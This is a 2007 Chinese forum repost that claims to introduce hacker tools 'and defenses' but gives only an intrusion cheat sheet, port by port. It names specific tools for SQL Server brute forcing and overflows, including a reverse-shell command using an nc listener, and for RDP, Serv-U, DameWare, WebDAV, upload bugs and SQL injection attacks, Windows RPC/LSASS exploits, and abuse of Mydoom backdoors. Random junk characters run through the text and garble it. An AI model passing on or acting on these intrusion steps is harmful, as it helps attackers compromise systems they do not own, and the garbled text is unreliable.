|
|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。
. ~/ h8 K. p1 I2 {/ u# F5 G% ? ( P+ \, y3 H) P( s: @3 T! K
2 E" a7 z# D N4 a. n- U9 @ 1. 1433端口入侵 + b) A( G- y/ v! r& M( z
o; O9 T4 M, W& Z
scanport.exe 查有1433的机器
( B7 u6 V' p" e5 E. O' r
' ~9 }; G2 d5 }8 ~* O* }6 Y: {- J! | SQLScanPass.exe 进行字典暴破(字典是关键)
6 m" i5 n1 V" o" M/ T
2 m, k+ W# \9 W$ e- s9 q& n7 x' L* s 最后 SQLTools.exe入侵 `+ @( @% v' N( x3 G: ?' d
) f( L2 w5 P& U. s# i8 e; [
=============================
3 v5 @+ P# t) B2 M: ~( ?& `: d: c: x: ~) [$ [$ ~
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
4 R- T i, a; {/ [0 j+ K+ V4 p+ L2 T3 E
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 & X( T c" b, K' F y
" B4 W4 r6 S7 t n. T8 ^& _& [. A
(以上反向的,测试成功) + N8 [8 D% |4 d6 y) E& W
, D( y- L) ]' l0 I T4 s# o sqlhelloz.exe 入侵ip 1433 (这个是正向连接) & W4 c; n$ U7 R$ D/ q0 [4 _- `
# v5 |. w/ l; n2 H N$ t- R 2. 4899端口入侵 0 |; J( L$ F3 t5 V8 u
+ @5 G/ Q7 l; g. d5 u$ f
用4899过滤器.exe,扫描空口令的机器 2 W: i8 j/ N/ H! K% X- W
' x; V) e1 V" n 3. 3899的入侵 3 h" g b+ N1 K: ]
* H5 [0 y% D! e1 N. n! K 对很早的机器,可以试试3389的溢出(win3389ex.exe) ; e$ @2 y4 Z* I \7 T6 ?$ G
( v2 |% x" `9 R 对2000的机器,可以试试字典暴破。(tscrack.exe) : `/ E& L. J; c& i; J
: I& C2 C6 D& J _( H# ^! h
4. 80入侵
" z: [1 x" K4 n* g' c7 h* z/ v
# m9 p9 P" ?$ N) X 对sp3以前的机器,可以用webdav入侵; 4 O" }0 P0 A. j3 d7 K4 h1 N
% {/ A6 s) p& [1 _% ` 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) # Z" n+ O3 n. F2 H4 l! u# u" ]
$ z* g e9 q% G0 @8 { 可以利用SQL进行注入。(小榕的注入软件)。
. v o9 F# [& _; B# \$ g
S+ Q; I/ i' Y. V3 ^# V# J 5. serv-u入侵(21端口)
, b1 f0 `' g+ m9 a7 \/ H: P8 U4 D7 e- [
对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 6 }6 H' \( |: w- O& m1 h
! A5 j# |- g) d5 C( s2 ]3 `
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
' G a( @7 f, s+ ^
% F2 q9 k, a: Q ======================================
$ w0 {0 ~. Q0 h$ R
' A# G$ N% ~( E- {; p 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) ! B2 K$ z5 d8 W3 C5 Y
! r: o% {7 E& A. P8 K 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A , _% u* W: U& B& l( H8 x: g2 D
3 ?) O' ^8 x6 b3 S 6. 554端口
4 B2 \! s! N/ b: T
! A% h( w0 H' e# B) K( P9 T 用real554.exe入侵。 6 E c7 Q2 Q/ K3 `6 Q
. P0 r2 h/ D( z7 M9 G
7. 6129端口 5 k5 `. i. Q" ~3 n: G( e
, j8 F( C+ h0 G& O: l
用DameWare6129.exe入侵。
6 }7 O: c1 |/ t' N3 ?7 R3 ?! z7 k5 A3 Z# `7 v5 Y
8. 系统漏洞 1 a8 v) K+ {4 v' e; q2 z
# R1 D D5 d2 ^( b! Q1 v' ] 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 5 U ]' s7 ]: `7 {
4 z3 U: @; }+ z3 z4 Y
进行溢出入侵。
2 }9 X! m+ Z( \& d9 Y" i; L, J% z0 o) f; d8 ?' u2 @
9. 3127等端口
2 }- x( t( _, f* G; H( x1 R( F
0 c) u8 J1 R+ l# e: d. D6 L W 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 2 K0 i u7 [6 w0 X. d8 k8 a
$ P3 r, W7 `3 ?, ]
10. 其他入侵 3 y. n( L5 a2 D* X3 l
5 Z2 @: q( J4 J0 f& t; M$ W3 m
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
6 }$ \ P' b2 |. V: D/ u1 M
9 j. o0 c( ]% d/ n2 Z| 转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|
/1 
IP卡
狗仔卡
发表于 2007-12-17 01:04:27
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
